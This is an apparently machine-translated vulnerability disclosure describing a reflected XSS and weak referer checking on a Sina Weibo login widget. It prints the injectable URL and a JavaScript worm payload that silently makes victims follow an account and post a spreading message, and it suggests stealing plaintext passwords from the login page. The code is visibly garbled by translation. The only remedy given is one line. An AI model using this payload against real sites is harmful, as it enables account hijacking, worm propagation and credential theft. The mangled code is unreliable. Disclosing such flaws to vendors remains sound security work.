A reflective XSS and refer verification on Sina Weibo is lax (user login names and plaintext passwords can be intercepted, worms can be used, and followers can be refreshed)

A reflective XSS and refer verification on Sina Weibo is lax (user login names and plaintext passwords can be intercepted, worms can be used, and followers can be refreshed)

I originally wanted to find a CSRF. I found an XSS, and then I found a refer with lax verification. In combination, I can click here to get my attention.

First, reflection XSS here: http://service.weibo.com/widget/public/login.php? Source = share & backurl = http://service.weibo.com/share/mobile.php? Url = aaaaaaaa ', a :( alert (1) // Add follow: POST: Warning! Congratulations! Then I wrote a code segment to test the effect.
(Function (){
// Set referrer
Var meta = document. createElement ('meta ');
Meta. name = 'referrer ';
Meta. content = 'origin ';
Document. head. appendChild (meta );
// Document. head. appendChild (style );
Var iframe = document. createElement ('iframe ');
Iframe. name = 'myframework'
Document. head. appendChild (iframe );
// Fowllo me
Var form = document. createElement ('form '),
Input1 = document. createElement ('input '),
Input2 = document. createElement ('input ');
Input1.name = 'wsrc ';
Input1.value = 'app _ follow_button ';
Input2.name = 'uid ';
Input2.value = '000000 ';
Form. appendChild (input1 );
Form. appendChild (input2 );
Form. action = 'HTTP: // widget.weibo.com/relationship/aj_attention.php ';
Form. method = 'post ';
Form.tar get = 'myframework ';
Document. head. appendChild (form );
Form. submit ();
// Create xhr
Var xhr = false;
Try {
Xhr = new XMLHttpRequest ()
} Catch (d ){
Try {
Xhr = new ActiveXObject ("Msxml2.XMLHTTP ")
} Catch (c ){
Try {
Xhr = new ActiveXObject ("Microsoft. XMLHTTP ")
} Catch (B ){
Xhr = false
}
}
}
// Send message
Var data = 'content = New Year! Congratulations! ';
Xhr. open ('post', 'HTTP: // service.weibo.com/#/aj_assist.php? T = '+ new Date (). getTime (), false );
Xhr. setRequestHeader ('content-type', 'application/x-www-form-urlencoded ');
Xhr. send (data );
})();
The user accessed the above XSS In the login status and tried to use AJAX in all cases. However, if the cross-domain authentication fails, the user changed to form. Then, the user shared the refer verification here, therefore, use JS to control the referrer of the current page as the origin, and then remotely load the above large JS Section through the reflection XSS. Then, the link in the content can be crawled by adding a link. I did not try to hijack the user name and password, but it should be possible in theory, because it was a normal login page on Weibo, and it was easy to intercept form data by inserting JavaScript.




Solution:
Filter, escape, and verify.